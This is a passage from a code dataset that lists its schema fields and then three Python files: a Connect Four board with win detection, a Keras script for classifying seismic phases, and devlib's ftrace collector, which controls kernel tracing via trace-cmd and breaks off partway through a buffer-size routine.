| column | type | values |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 2 to 1.02M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 4 to 245 |
| max_stars_repo_name | string | length 6 to 130 |
| max_stars_repo_head_hexsha | string | length 40 |
| max_stars_repo_licenses | list | length 1 to 10 |
| max_stars_count | int64 | 1 to 191k, nullable |
| max_stars_repo_stars_event_min_datetime | string | length 24, nullable |
| max_stars_repo_stars_event_max_datetime | string | length 24, nullable |
| max_issues_repo_path | string | length 4 to 245 |
| max_issues_repo_name | string | length 6 to 130 |
| max_issues_repo_head_hexsha | string | length 40 |
| max_issues_repo_licenses | list | length 1 to 10 |
| max_issues_count | int64 | 1 to 67k, nullable |
| max_issues_repo_issues_event_min_datetime | string | length 24, nullable |
| max_issues_repo_issues_event_max_datetime | string | length 24, nullable |
| max_forks_repo_path | string | length 4 to 245 |
| max_forks_repo_name | string | length 6 to 130 |
| max_forks_repo_head_hexsha | string | length 40 |
| max_forks_repo_licenses | list | length 1 to 10 |
| max_forks_count | int64 | 1 to 105k, nullable |
| max_forks_repo_forks_event_min_datetime | string | length 24, nullable |
| max_forks_repo_forks_event_max_datetime | string | length 24, nullable |
| content | string | length 2 to 1.02M |
| avg_line_length | float64 | 1 to 417k |
| max_line_length | int64 | 1 to 987k |
| alphanum_fraction | float64 | 0 to 1 |
| content_no_comment | string | length 0 to 1.01M |
| is_comment_constant_removed | bool | 1 class |
| is_sharp_comment_removed | bool | 1 class |

hexsha: 1c3e768600e54d3c1c007e307058c3b2ee2dfba3 | size: 4,554 | ext: py | lang: Python
max_stars: repo_path board.py | repo_name SebBlin/p4 | head 342753a1e9bf018751cf0f4eff69e8f240df53e7 | licenses ["MIT"] | count 1 | events 2020-06-14T19:10:35.000Z to 2020-06-14T19:10:35.000Z
max_issues: repo_path board.py | repo_name SebBlin/p4 | head 342753a1e9bf018751cf0f4eff69e8f240df53e7 | licenses ["MIT"] | count null | events null to null
max_forks: repo_path board.py | repo_name SebBlin/p4 | head 342753a1e9bf018751cf0f4eff69e8f240df53e7 | licenses ["MIT"] | count null | events null to null
content:
import numpy as np
import hashlib
nbcol = 7
nbligne = 6
pion = [' ', 'X', 'O']
def print_top_line():
print(u'\u250c', end = '')
for _ in range(nbcol-1):
print(u'\u2500\u252c', sep = '', end = '')
print(u'\u2500\u2510')
def print_mid_line_empty(tab_line):
for i in range(nbcol):
print(u'\u2502',pion[tab_line[i]], sep = '', end = '')
print(u'\u2502')
def print_mid_line_full():
print(u'\u251c', end = '')
for _ in range(nbcol-1):
print(u'\u2500\u253c', end = '')
print(u'\u2500\u2524')
def print_bottom_line():
print(u'\u2514', end = '')
for _ in range(nbcol-1):
print(u'\u2500\u2534', end = '')
print(u'\u2500\u2518')
def print_numbers():
print(" ", end = '')
for i in range(nbcol):
print(i, end = '')
print(' ', end = '')
print()
def get_diagonal_gauche(g):
tab=[]
for d in range(6):
i = min(d+3,nbcol-1)
j = max(0,d-3)
l=[]
while i>=0 and j<=nbligne-1 :
l.append(g[j,i])
i-=1
j+=1
tab.append(l)
return tab
def get_diagonal_droite(g):
tab=[]
for d in range(7):
i = max(0,d-2)
j = max(2-d,0)
l=[]
while i<nbcol and j<nbligne :
#print ('i=',i,'j=',j, 'x=',g[j,i] )
l.append(g[j,i])
i+=1
j+=1
tab.append(l)
return tab
def get_horizontal(g):
return g
def get_vertical(g):
return g.T
def test_4_successif (ligne,joueur):
for i in range (len(ligne)-3):
if (ligne[i] == joueur and ligne[i+1] == joueur and ligne[i+2] == joueur and ligne[i+3] == joueur):
return True
return False
class Board(object):
def __init__(self, grille = None):
if grille is None:
self.grille = np.array([
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
])
else:
self.grille = grille.copy()
self.num_play = 0
self.moves = []
self.height = [0, 7, 14, 21, 28, 35, 42]
self.bitboard = [0]*2
def print_board(self):
print_top_line()
for i in range(nbligne-1):
print_mid_line_empty(self.grille[i])
print_mid_line_full()
print_mid_line_empty(self.grille[nbligne-1])
print_bottom_line()
print_numbers()
def play(self,col, label):
play_row_in_col = nbligne - 1 - np.count_nonzero(self.grille.T[col])
self.grille[play_row_in_col,col] = label
self.num_play +=1
self.height[col] += 1
move = 1 << self.height[col]
self.bitboard[self.num_play & 1] ^= move
self.moves.append(col)
def copy(self):
new_board = Board()
new_board.grille = self.grille.copy()
new_board.num_play = self.num_play
new_board.bitboard = self.bitboard.copy()
new_board.moves = self.moves.copy()
new_board.height = self.height.copy()
return new_board
def can_play(self, move):
return self.grille[0,move] == 0
def get_hash(self):
return hashlib.sha256(self.grille.tobytes()).hexdigest()
def is_won(self,player):
for l in get_horizontal(self.grille):
if test_4_successif(l,player):
return player
for l in get_vertical(self.grille):
if test_4_successif(l,player):
return player
for l in get_diagonal_gauche(self.grille):
if test_4_successif(l,player):
return player
for l in get_diagonal_droite(self.grille):
if test_4_successif(l,player):
return player
return 0
def is_won_quick(self, player):
directions = [1, 6, 7, 8]
bb_player = self.bitboard[player & 1]
bb = 0
for d in directions:
bb = bb_player & (bb_player >> d)
if ((bb & (bb >> (2* d))) != 0):
return True
return False
# boolean isWin(long bitboard) {
# int[] directions = {1, 7, 6, 8};
# long bb;
# for(int direction : directions) {
# bb = bitboard & (bitboard >> direction);
# if ((bb & (bb >> (2 * direction))) != 0) return true;
# }
# return false;
# }
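A minimal usage sketch of the `Board` class above (an illustration, not part of the dataset row): it assumes the file is importable as `board`, and uses the player labels 1 ('X') and 2 ('O') implied by `pion`. Player 1 stacks four pieces in column 3, so both the grid-based and the bitboard win checks should report a win.

```python
# Sketch only: assumes board.py above is importable as `board`.
from board import Board

b = Board()
for col_p1, col_p2 in [(3, 0), (3, 1), (3, 2)]:
    b.play(col_p1, 1)   # player 1 ('X') keeps stacking column 3
    b.play(col_p2, 2)   # player 2 ('O') plays elsewhere
b.play(3, 1)            # fourth 'X' in column 3: vertical connect four

b.print_board()
print(b.is_won(1))        # grid scan: returns 1 (the winning player)
print(b.is_won_quick(1))  # bitboard scan: True
```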
avg_line_length: 27.433735 | max_line_length: 107 | alphanum_fraction: 0.504172
content_no_comment:
import numpy as np
import hashlib
nbcol = 7
nbligne = 6
pion = [' ', 'X', 'O']
def print_top_line():
print(u'\u250c', end = '')
for _ in range(nbcol-1):
print(u'\u2500\u252c', sep = '', end = '')
print(u'\u2500\u2510')
def print_mid_line_empty(tab_line):
for i in range(nbcol):
print(u'\u2502',pion[tab_line[i]], sep = '', end = '')
print(u'\u2502')
def print_mid_line_full():
print(u'\u251c', end = '')
for _ in range(nbcol-1):
print(u'\u2500\u253c', end = '')
print(u'\u2500\u2524')
def print_bottom_line():
print(u'\u2514', end = '')
for _ in range(nbcol-1):
print(u'\u2500\u2534', end = '')
print(u'\u2500\u2518')
def print_numbers():
print(" ", end = '')
for i in range(nbcol):
print(i, end = '')
print(' ', end = '')
print()
def get_diagonal_gauche(g):
tab=[]
for d in range(6):
i = min(d+3,nbcol-1)
j = max(0,d-3)
l=[]
while i>=0 and j<=nbligne-1 :
l.append(g[j,i])
i-=1
j+=1
tab.append(l)
return tab
def get_diagonal_droite(g):
tab=[]
for d in range(7):
i = max(0,d-2)
j = max(2-d,0)
l=[]
while i<nbcol and j<nbligne :
l.append(g[j,i])
i+=1
j+=1
tab.append(l)
return tab
def get_horizontal(g):
return g
def get_vertical(g):
return g.T
def test_4_successif (ligne,joueur):
for i in range (len(ligne)-3):
if (ligne[i] == joueur and ligne[i+1] == joueur and ligne[i+2] == joueur and ligne[i+3] == joueur):
return True
return False
class Board(object):
def __init__(self, grille = None):
if grille is None:
self.grille = np.array([
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
])
else:
self.grille = grille.copy()
self.num_play = 0
self.moves = []
self.height = [0, 7, 14, 21, 28, 35, 42]
self.bitboard = [0]*2
def print_board(self):
print_top_line()
for i in range(nbligne-1):
print_mid_line_empty(self.grille[i])
print_mid_line_full()
print_mid_line_empty(self.grille[nbligne-1])
print_bottom_line()
print_numbers()
def play(self,col, label):
play_row_in_col = nbligne - 1 - np.count_nonzero(self.grille.T[col])
self.grille[play_row_in_col,col] = label
self.num_play +=1
self.height[col] += 1
move = 1 << self.height[col]
self.bitboard[self.num_play & 1] ^= move
self.moves.append(col)
def copy(self):
new_board = Board()
new_board.grille = self.grille.copy()
new_board.num_play = self.num_play
new_board.bitboard = self.bitboard.copy()
new_board.moves = self.moves.copy()
new_board.height = self.height.copy()
return new_board
def can_play(self, move):
return self.grille[0,move] == 0
def get_hash(self):
return hashlib.sha256(self.grille.tobytes()).hexdigest()
def is_won(self,player):
for l in get_horizontal(self.grille):
if test_4_successif(l,player):
return player
for l in get_vertical(self.grille):
if test_4_successif(l,player):
return player
for l in get_diagonal_gauche(self.grille):
if test_4_successif(l,player):
return player
for l in get_diagonal_droite(self.grille):
if test_4_successif(l,player):
return player
return 0
def is_won_quick(self, player):
directions = [1, 6, 7, 8]
bb_player = self.bitboard[player & 1]
bb = 0
for d in directions:
bb = bb_player & (bb_player >> d)
if ((bb & (bb >> (2* d))) != 0):
return True
return False
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 1c3e769abaf60b187cfc57bec702401e64629712 | size: 6,620 | ext: py | lang: Python
max_stars: repo_path phase_classification_features.py | repo_name cahya-wirawan/phase-detection | head ca65442c4f2a30004a17cf79cbe54cf9c2f6925d | licenses ["MIT"] | count null | events null to null
max_issues: repo_path phase_classification_features.py | repo_name cahya-wirawan/phase-detection | head ca65442c4f2a30004a17cf79cbe54cf9c2f6925d | licenses ["MIT"] | count null | events null to null
max_forks: repo_path phase_classification_features.py | repo_name cahya-wirawan/phase-detection | head ca65442c4f2a30004a17cf79cbe54cf9c2f6925d | licenses ["MIT"] | count null | events null to null
content:
import argparse
import numpy as np
from keras.wrappers.scikit_learn import KerasClassifier
from keras.callbacks import ModelCheckpoint, TensorBoard
from keras.models import load_model
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import KFold
from sklearn.metrics import confusion_matrix
from phase_utils import print_cm
from phase_features_loader import PhaseFeaturesLoader
from phase_model_simple import model_simple
from phase_model_resnet import model_resnet
if __name__ == "__main__":
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-a", "--action", choices=["train", "test"], default="train",
help="set the action, either training or test the dataset")
parser.add_argument("--train_dataset", default="data/phase/ml_features_train.csv",
help="set the path to the training dataset")
parser.add_argument("--test_dataset", default="data/phase/ml_features_test.csv",
help="set the path to the test dataset")
parser.add_argument("-m", "--model", default=None,
help="set the path to the pre-trained model/weights")
parser.add_argument("--cv", type=bool, default=False,
help="enable / disable a full cross validation with n_splits=10")
parser.add_argument("-b", "--batch_size", type=int, default=256,
help="set the batch size)")
parser.add_argument("-e", "--epochs", type=int, default=2000,
help="set the epochs number)")
parser.add_argument("-l", "--layers", default="128 128 64 48 48 32 32 48 32 16",
help="set the hidden layers)")
parser.add_argument("-d", "--dropout", type=float, default=0.1,
help="set the dropout)")
parser.add_argument("-s", "--stations", default="URZ",
help="set the station name, it supports currently only LPAZ and URZ")
parser.add_argument("-v", "--verbose", type=int, default=0,
help="set the verbosity)")
parser.add_argument("-p", "--phase_length", default="URZ 6840 6840 6840 20520",
help="set the number of entries of phases per stations to be read from the dataset.\n" +
"The default is for the training, for the test use 'URZ 2280 2280 2280 6840, " +
"LPAZ 160 160 160 480'")
args = parser.parse_args()
# fix random seed for reproducibility
seed = 7
np.random.seed(seed)
epochs = args.epochs
train_dataset = args.train_dataset
test_dataset = args.test_dataset
phase_length = {}
try:
for p in args.phase_length.split(","):
s = p.strip().split(" ")
phase_length.update({s[0]:{"regP": int(s[1]), "regS": int(s[2]), "tele": int(s[3]), "N": int(s[4])}})
except ValueError:
print("It should be a list of a station name followed by four numbers.")
exit(1)
stations_lower = [station.lower() for station in sorted(phase_length.keys())]
layers = []
try:
layers = [int(units) for units in args.layers.split(" ")]
except ValueError:
print("The layers should be a list of integer, delimited by a whitespace")
exit(1)
dropout = args.dropout
batch_size = args.batch_size
validation_split = 0.1
if args.model is None:
model_file_path = "results/phase_weights_best_s_{}_l_{}_d_{}.hdf5".\
format("_".join(stations_lower), "_".join([str(layer) for layer in layers]), dropout)
else:
model_file_path = args.model
model = model_resnet
if args.action == "train":
# load train dataset
pd = PhaseFeaturesLoader(filename=train_dataset, validation_split=validation_split,
phase_length=phase_length, batch_size=batch_size)
tensorboard = TensorBoard(log_dir='graph', histogram_freq=0, write_graph=True, write_images=True)
checkpoint = ModelCheckpoint(model_file_path, monitor='acc', verbose=args.verbose,
save_best_only=True, mode='max')
if args.cv:
train_x, train_y = pd.get_dataset()
kfold = KFold(n_splits=10, shuffle=True, random_state=seed)
estimator = KerasClassifier(build_fn=model, layers=layers, dropout=dropout,
epochs=epochs, batch_size=500, verbose=args.verbose)
results = cross_val_score(estimator, train_x, train_y, cv=kfold,
fit_params={'callbacks':[checkpoint, tensorboard]})
print("Baseline: %.2f%% (%.2f%%)" % (results.mean()*100, results.std()*100))
else:
model = model(layers=layers, dropout=dropout, layer_number=10)
print(model.summary())
class_weight = {0:1, 1:1, 2:1, 3:1}
history = model.fit_generator(generator = pd.generate("train"),
steps_per_epoch = pd.get_len("train")//batch_size,
validation_data = pd.generate("validation"),
validation_steps = pd.get_len("validation")//batch_size,
use_multiprocessing=True, class_weight=None,
epochs=epochs, verbose=args.verbose, callbacks=[checkpoint, tensorboard])
print("Max of acc: {}, val_acc: {}".
format(max(history.history["acc"]), max(history.history["val_acc"])))
print("Min of loss: {}, val_loss: {}".
format(min(history.history["loss"]), min(history.history["val_loss"])))
else:
# load test dataset
pd = PhaseFeaturesLoader(filename=test_dataset, phase_length=phase_length, batch_size=batch_size)
test_x, test_y = pd.get_dataset()
# load model & weight
loaded_model = load_model(model_file_path)
print("Loaded model from disk")
# evaluate loaded model on test data
loaded_model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
score = loaded_model.evaluate(test_x, test_y, verbose=0)
prediction = loaded_model.predict(test_x, verbose=0)
print("%s: %.2f%%" % (loaded_model.metrics_names[1], score[1]*100))
print("Confusion matrix:")
phases = ['regP', 'regS', 'tele', 'N']
cm = confusion_matrix(test_y.argmax(axis=1), prediction.argmax(axis=1))
print_cm(cm, labels=phases)
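A standalone sketch of how the `--phase_length` string above is parsed (it mirrors the `try` block in the script; the station names and counts are just the defaults quoted in the help text):

```python
# Mirrors the --phase_length parsing in the script above; example values only.
arg = "URZ 2280 2280 2280 6840, LPAZ 160 160 160 480"

phase_length = {}
for p in arg.split(","):
    s = p.strip().split(" ")
    # one station name followed by entry counts for the regP, regS, tele and N phases
    phase_length[s[0]] = {"regP": int(s[1]), "regS": int(s[2]),
                          "tele": int(s[3]), "N": int(s[4])}

print(phase_length)
# {'URZ': {'regP': 2280, 'regS': 2280, 'tele': 2280, 'N': 6840},
#  'LPAZ': {'regP': 160, 'regS': 160, 'tele': 160, 'N': 480}}
```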
avg_line_length: 52.539683 | max_line_length: 113 | alphanum_fraction: 0.616163
content_no_comment:
import argparse
import numpy as np
from keras.wrappers.scikit_learn import KerasClassifier
from keras.callbacks import ModelCheckpoint, TensorBoard
from keras.models import load_model
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import KFold
from sklearn.metrics import confusion_matrix
from phase_utils import print_cm
from phase_features_loader import PhaseFeaturesLoader
from phase_model_simple import model_simple
from phase_model_resnet import model_resnet
if __name__ == "__main__":
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-a", "--action", choices=["train", "test"], default="train",
help="set the action, either training or test the dataset")
parser.add_argument("--train_dataset", default="data/phase/ml_features_train.csv",
help="set the path to the training dataset")
parser.add_argument("--test_dataset", default="data/phase/ml_features_test.csv",
help="set the path to the test dataset")
parser.add_argument("-m", "--model", default=None,
help="set the path to the pre-trained model/weights")
parser.add_argument("--cv", type=bool, default=False,
help="enable / disable a full cross validation with n_splits=10")
parser.add_argument("-b", "--batch_size", type=int, default=256,
help="set the batch size)")
parser.add_argument("-e", "--epochs", type=int, default=2000,
help="set the epochs number)")
parser.add_argument("-l", "--layers", default="128 128 64 48 48 32 32 48 32 16",
help="set the hidden layers)")
parser.add_argument("-d", "--dropout", type=float, default=0.1,
help="set the dropout)")
parser.add_argument("-s", "--stations", default="URZ",
help="set the station name, it supports currently only LPAZ and URZ")
parser.add_argument("-v", "--verbose", type=int, default=0,
help="set the verbosity)")
parser.add_argument("-p", "--phase_length", default="URZ 6840 6840 6840 20520",
help="set the number of entries of phases per stations to be read from the dataset.\n" +
"The default is for the training, for the test use 'URZ 2280 2280 2280 6840, " +
"LPAZ 160 160 160 480'")
args = parser.parse_args()
seed = 7
np.random.seed(seed)
epochs = args.epochs
train_dataset = args.train_dataset
test_dataset = args.test_dataset
phase_length = {}
try:
for p in args.phase_length.split(","):
s = p.strip().split(" ")
phase_length.update({s[0]:{"regP": int(s[1]), "regS": int(s[2]), "tele": int(s[3]), "N": int(s[4])}})
except ValueError:
print("It should be a list of a station name followed by four numbers.")
exit(1)
stations_lower = [station.lower() for station in sorted(phase_length.keys())]
layers = []
try:
layers = [int(units) for units in args.layers.split(" ")]
except ValueError:
print("The layers should be a list of integer, delimited by a whitespace")
exit(1)
dropout = args.dropout
batch_size = args.batch_size
validation_split = 0.1
if args.model is None:
model_file_path = "results/phase_weights_best_s_{}_l_{}_d_{}.hdf5".\
format("_".join(stations_lower), "_".join([str(layer) for layer in layers]), dropout)
else:
model_file_path = args.model
model = model_resnet
if args.action == "train":
pd = PhaseFeaturesLoader(filename=train_dataset, validation_split=validation_split,
phase_length=phase_length, batch_size=batch_size)
tensorboard = TensorBoard(log_dir='graph', histogram_freq=0, write_graph=True, write_images=True)
checkpoint = ModelCheckpoint(model_file_path, monitor='acc', verbose=args.verbose,
save_best_only=True, mode='max')
if args.cv:
train_x, train_y = pd.get_dataset()
kfold = KFold(n_splits=10, shuffle=True, random_state=seed)
estimator = KerasClassifier(build_fn=model, layers=layers, dropout=dropout,
epochs=epochs, batch_size=500, verbose=args.verbose)
results = cross_val_score(estimator, train_x, train_y, cv=kfold,
fit_params={'callbacks':[checkpoint, tensorboard]})
print("Baseline: %.2f%% (%.2f%%)" % (results.mean()*100, results.std()*100))
else:
model = model(layers=layers, dropout=dropout, layer_number=10)
print(model.summary())
class_weight = {0:1, 1:1, 2:1, 3:1}
history = model.fit_generator(generator = pd.generate("train"),
steps_per_epoch = pd.get_len("train")//batch_size,
validation_data = pd.generate("validation"),
validation_steps = pd.get_len("validation")//batch_size,
use_multiprocessing=True, class_weight=None,
epochs=epochs, verbose=args.verbose, callbacks=[checkpoint, tensorboard])
print("Max of acc: {}, val_acc: {}".
format(max(history.history["acc"]), max(history.history["val_acc"])))
print("Min of loss: {}, val_loss: {}".
format(min(history.history["loss"]), min(history.history["val_loss"])))
else:
pd = PhaseFeaturesLoader(filename=test_dataset, phase_length=phase_length, batch_size=batch_size)
test_x, test_y = pd.get_dataset()
loaded_model = load_model(model_file_path)
print("Loaded model from disk")
loaded_model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
score = loaded_model.evaluate(test_x, test_y, verbose=0)
prediction = loaded_model.predict(test_x, verbose=0)
print("%s: %.2f%%" % (loaded_model.metrics_names[1], score[1]*100))
print("Confusion matrix:")
phases = ['regP', 'regS', 'tele', 'N']
cm = confusion_matrix(test_y.argmax(axis=1), prediction.argmax(axis=1))
print_cm(cm, labels=phases)
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 1c3e769dcf5543050992240a4de1783bd64c6643 | size: 15,400 | ext: py | lang: Python
max_stars: repo_path devlib/trace/ftrace.py | repo_name douglas-raillard-arm/devlib | head e3d9c4b2fdf5b878b51204713c34d7fc6dd6b305 | licenses ["Apache-2.0"] | count null | events null to null
max_issues: repo_path devlib/trace/ftrace.py | repo_name douglas-raillard-arm/devlib | head e3d9c4b2fdf5b878b51204713c34d7fc6dd6b305 | licenses ["Apache-2.0"] | count null | events null to null
max_forks: repo_path devlib/trace/ftrace.py | repo_name douglas-raillard-arm/devlib | head e3d9c4b2fdf5b878b51204713c34d7fc6dd6b305 | licenses ["Apache-2.0"] | count null | events null to null
content:
# Copyright 2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import division
import os
import json
import time
import re
import subprocess
from devlib.trace import TraceCollector
from devlib.host import PACKAGE_BIN_DIRECTORY
from devlib.exception import TargetError, HostError
from devlib.utils.misc import check_output, which
TRACE_MARKER_START = 'TRACE_MARKER_START'
TRACE_MARKER_STOP = 'TRACE_MARKER_STOP'
OUTPUT_TRACE_FILE = 'trace.dat'
OUTPUT_PROFILE_FILE = 'trace_stat.dat'
DEFAULT_EVENTS = [
'cpu_frequency',
'cpu_idle',
'sched_migrate_task',
'sched_process_exec',
'sched_process_fork',
'sched_stat_iowait',
'sched_switch',
'sched_wakeup',
'sched_wakeup_new',
]
TIMEOUT = 180
# Regexps for parsing of function profiling data
CPU_RE = re.compile(r' Function \(CPU([0-9]+)\)')
STATS_RE = re.compile(r'([^ ]*) +([0-9]+) +([0-9.]+) us +([0-9.]+) us +([0-9.]+) us')
class FtraceCollector(TraceCollector):
def __init__(self, target,
events=None,
functions=None,
buffer_size=None,
buffer_size_step=1000,
tracing_path='/sys/kernel/debug/tracing',
automark=True,
autoreport=True,
autoview=False,
no_install=False,
strict=False,
report_on_target=False,
):
super(FtraceCollector, self).__init__(target)
self.events = events if events is not None else DEFAULT_EVENTS
self.functions = functions
self.buffer_size = buffer_size
self.buffer_size_step = buffer_size_step
self.tracing_path = tracing_path
self.automark = automark
self.autoreport = autoreport
self.autoview = autoview
self.report_on_target = report_on_target
self.target_output_file = target.path.join(self.target.working_directory, OUTPUT_TRACE_FILE)
text_file_name = target.path.splitext(OUTPUT_TRACE_FILE)[0] + '.txt'
self.target_text_file = target.path.join(self.target.working_directory, text_file_name)
self.target_binary = None
self.host_binary = None
self.start_time = None
self.stop_time = None
self.event_string = None
self.function_string = None
self._reset_needed = True
# Setup tracing paths
self.available_events_file = self.target.path.join(self.tracing_path, 'available_events')
self.available_functions_file = self.target.path.join(self.tracing_path, 'available_filter_functions')
self.buffer_size_file = self.target.path.join(self.tracing_path, 'buffer_size_kb')
self.current_tracer_file = self.target.path.join(self.tracing_path, 'current_tracer')
self.function_profile_file = self.target.path.join(self.tracing_path, 'function_profile_enabled')
self.marker_file = self.target.path.join(self.tracing_path, 'trace_marker')
self.ftrace_filter_file = self.target.path.join(self.tracing_path, 'set_ftrace_filter')
self.host_binary = which('trace-cmd')
self.kernelshark = which('kernelshark')
if not self.target.is_rooted:
raise TargetError('trace-cmd instrument cannot be used on an unrooted device.')
if self.autoreport and not self.report_on_target and self.host_binary is None:
raise HostError('trace-cmd binary must be installed on the host if autoreport=True.')
if self.autoview and self.kernelshark is None:
raise HostError('kernelshark binary must be installed on the host if autoview=True.')
if not no_install:
host_file = os.path.join(PACKAGE_BIN_DIRECTORY, self.target.abi, 'trace-cmd')
self.target_binary = self.target.install(host_file)
else:
if not self.target.is_installed('trace-cmd'):
raise TargetError('No trace-cmd found on device and no_install=True is specified.')
self.target_binary = 'trace-cmd'
# Validate required events to be traced
available_events = self.target.execute(
'cat {}'.format(self.available_events_file),
as_root=True).splitlines()
selected_events = []
for event in self.events:
# Convert globs supported by FTrace into valid regexp globs
_event = event
if event[0] != '*':
_event = '*' + event
event_re = re.compile(_event.replace('*', '.*'))
# Select events matching the required ones
if len(filter(event_re.match, available_events)) == 0:
message = 'Event [{}] not available for tracing'.format(event)
if strict:
raise TargetError(message)
self.target.logger.warning(message)
else:
selected_events.append(event)
# If function profiling is enabled we always need at least one event.
        # Thus, if no other events have been specified, try to add at least
        # a tracepoint which is always available and possibly triggered a few
        # times.
if self.functions and len(selected_events) == 0:
selected_events = ['sched_wakeup_new']
self.event_string = _build_trace_events(selected_events)
# Check for function tracing support
if self.functions:
if not self.target.file_exists(self.function_profile_file):
raise TargetError('Function profiling not supported. '\
'A kernel build with CONFIG_FUNCTION_PROFILER enable is required')
# Validate required functions to be traced
available_functions = self.target.execute(
'cat {}'.format(self.available_functions_file),
as_root=True).splitlines()
selected_functions = []
for function in self.functions:
if function not in available_functions:
message = 'Function [{}] not available for profiling'.format(function)
if strict:
raise TargetError(message)
self.target.logger.warning(message)
else:
selected_functions.append(function)
self.function_string = _build_trace_functions(selected_functions)
def reset(self):
if self.buffer_size:
self._set_buffer_size()
self.target.execute('{} reset'.format(self.target_binary),
as_root=True, timeout=TIMEOUT)
self._reset_needed = False
def start(self):
self.start_time = time.time()
if self._reset_needed:
self.reset()
self.target.execute('{} start {}'.format(self.target_binary, self.event_string),
as_root=True)
if self.automark:
self.mark_start()
if 'cpufreq' in self.target.modules:
self.logger.debug('Trace CPUFreq frequencies')
self.target.cpufreq.trace_frequencies()
if 'cpuidle' in self.target.modules:
self.logger.debug('Trace CPUIdle states')
self.target.cpuidle.perturb_cpus()
# Enable kernel function profiling
if self.functions:
self.target.execute('echo nop > {}'.format(self.current_tracer_file),
as_root=True)
self.target.execute('echo 0 > {}'.format(self.function_profile_file),
as_root=True)
self.target.execute('echo {} > {}'.format(self.function_string, self.ftrace_filter_file),
as_root=True)
self.target.execute('echo 1 > {}'.format(self.function_profile_file),
as_root=True)
def stop(self):
# Disable kernel function profiling
if self.functions:
self.target.execute('echo 1 > {}'.format(self.function_profile_file),
as_root=True)
if 'cpufreq' in self.target.modules:
self.logger.debug('Trace CPUFreq frequencies')
self.target.cpufreq.trace_frequencies()
self.stop_time = time.time()
if self.automark:
self.mark_stop()
self.target.execute('{} stop'.format(self.target_binary),
timeout=TIMEOUT, as_root=True)
self._reset_needed = True
def get_trace(self, outfile):
if os.path.isdir(outfile):
outfile = os.path.join(outfile, os.path.basename(self.target_output_file))
self.target.execute('{0} extract -o {1}; chmod 666 {1}'.format(self.target_binary,
self.target_output_file),
timeout=TIMEOUT, as_root=True)
# The size of trace.dat will depend on how long trace-cmd was running.
        # Therefore the timeout for the pull command must also be adjusted
# accordingly.
pull_timeout = 10 * (self.stop_time - self.start_time)
self.target.pull(self.target_output_file, outfile, timeout=pull_timeout)
if not os.path.isfile(outfile):
self.logger.warning('Binary trace not pulled from device.')
else:
if self.autoreport:
textfile = os.path.splitext(outfile)[0] + '.txt'
if self.report_on_target:
self.generate_report_on_target()
self.target.pull(self.target_text_file,
textfile, timeout=pull_timeout)
else:
self.report(outfile, textfile)
if self.autoview:
self.view(outfile)
def get_stats(self, outfile):
if not self.functions:
return
if os.path.isdir(outfile):
outfile = os.path.join(outfile, OUTPUT_PROFILE_FILE)
output = self.target._execute_util('ftrace_get_function_stats',
as_root=True)
function_stats = {}
for line in output.splitlines():
# Match a new CPU dataset
match = CPU_RE.search(line)
if match:
cpu_id = int(match.group(1))
function_stats[cpu_id] = {}
self.logger.debug("Processing stats for CPU%d...", cpu_id)
continue
# Match a new function dataset
match = STATS_RE.search(line)
if match:
fname = match.group(1)
function_stats[cpu_id][fname] = {
'hits' : int(match.group(2)),
'time' : float(match.group(3)),
'avg' : float(match.group(4)),
's_2' : float(match.group(5)),
}
self.logger.debug(" %s: %s",
fname, function_stats[cpu_id][fname])
self.logger.debug("FTrace stats output [%s]...", outfile)
with open(outfile, 'w') as fh:
json.dump(function_stats, fh, indent=4)
self.logger.debug("FTrace function stats save in [%s]", outfile)
return function_stats
def report(self, binfile, destfile):
# To get the output of trace.dat, trace-cmd must be installed
# This is done host-side because the generated file is very large
try:
command = '{} report {} > {}'.format(self.host_binary, binfile, destfile)
self.logger.debug(command)
process = subprocess.Popen(command, stderr=subprocess.PIPE, shell=True)
_, error = process.communicate()
if process.returncode:
raise TargetError('trace-cmd returned non-zero exit code {}'.format(process.returncode))
if error:
# logged at debug level, as trace-cmd always outputs some
# errors that seem benign.
self.logger.debug(error)
if os.path.isfile(destfile):
self.logger.debug('Verifying traces.')
with open(destfile) as fh:
for line in fh:
if 'EVENTS DROPPED' in line:
self.logger.warning('Dropped events detected.')
break
else:
self.logger.debug('Trace verified.')
else:
self.logger.warning('Could not generate trace.txt.')
except OSError:
raise HostError('Could not find trace-cmd. Please make sure it is installed and is in PATH.')
def generate_report_on_target(self):
command = '{} report {} > {}'.format(self.target_binary,
self.target_output_file,
self.target_text_file)
self.target.execute(command, timeout=TIMEOUT)
def view(self, binfile):
check_output('{} {}'.format(self.kernelshark, binfile), shell=True)
def teardown(self):
self.target.remove(self.target.path.join(self.target.working_directory, OUTPUT_TRACE_FILE))
def mark_start(self):
self.target.write_value(self.marker_file, TRACE_MARKER_START, verify=False)
def mark_stop(self):
self.target.write_value(self.marker_file, TRACE_MARKER_STOP, verify=False)
def _set_buffer_size(self):
target_buffer_size = self.buffer_size
attempt_buffer_size = target_buffer_size
buffer_size = 0
floor = 1000 if target_buffer_size > 1000 else target_buffer_size
while attempt_buffer_size >= floor:
self.target.write_value(self.buffer_size_file, attempt_buffer_size, verify=False)
buffer_size = self.target.read_int(self.buffer_size_file)
if buffer_size == attempt_buffer_size:
